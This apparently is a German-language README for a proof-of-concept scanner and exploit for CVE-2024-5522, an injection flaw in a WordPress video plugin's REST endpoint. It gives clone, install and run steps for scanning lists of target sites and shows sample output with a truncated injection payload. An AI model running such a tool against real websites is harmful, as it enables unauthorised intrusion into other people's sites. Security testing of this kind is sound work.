
Ein PoC-Exploit-Scanner für die CVE-2024-5522-Schwachstelle in WordPress-Websites
Ein PoC-Exploit-Scanner für die CVE-2024-5522-Schwachstelle auf WordPress-Websites. Dieses Tool hilft, die Schwachstelle zu identifizieren und auszunutzen, indem es eine Liste von Ziel-URLs scannt und eine bestimmte Payload anwendet, um festzustellen, ob die Website angreifbar ist.
Repository klonen:
git clone https://github.com/geniuszly/CVE-2024-5522
In das Verzeichnis wechseln:
cd CVE-2024-5522
Erforderliche Python-Pakete installieren:
pip install -r requirements.txt
Ziel-Liste vorbereiten: Erstellen Sie eine Textdatei, die die URLs der WordPress-Sites enthält, die Sie scannen möchten. Jede URL sollte in einer neuen Zeile stehen.
Scanner ausführen:
python3 main.py
Sie werden aufgefordert, den Pfad zu Ihrer Ziel-Listendatei einzugeben. Das Tool beginnt dann, jedes Ziel auf die CVE-2024-5522-Schwachstelle zu scannen, wobei die bereitgestellte Payload verwendet wird.
Ergebnisse interpretieren:
Die Ausgabe ist farbcodiert:
______ _______ ____ ___ ____ _ _ ____ ____ ____ ____
/ ___\ \ / / ____| |___ \ / _ \___ \| || | | ___| ___|___ \|___ \
| | \ \ / /| _| _____ __) | | | |__) | || |_ ____|___ \___ \ __) | __) |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|_____|__) |__) / __/ / __/
\____| \_/ |_____| |_____|\___/_____| |_| |____/____/_____|_____|
CVE-2024-5522 Exploit Scanner
developed by geniuszly
Введите путь к списку целей: targets.txt
[Сканирование http://example.com]
[-] http://example.com не уязвима.
[Сканирование http://vulnerable-site.com]
[+] Цель уязвима! :D http://vulnerable-site.com
[Сканирование http://another-site.com]
[!] Ошибка подключения к http://another-site.com: Connection timeout
[Уязвимые URL-адреса]
[+] http://vulnerable-site.com/wp-json/h5vp/v1/video/0?id=-1'...
Die Payload, die für den Exploit verwendet wird, ist in payload.txt gespeichert. Sie können diese Datei nach Bedarf anpassen oder ändern.
Dieses Tool ist ausschließlich für Bildungszwecke und ethische Sicherheitstests bestimmt. Die unbefugte Nutzung dieses Tools gegen Ziele ohne ausdrückliche Genehmigung ist illegal und strengstens untersagt.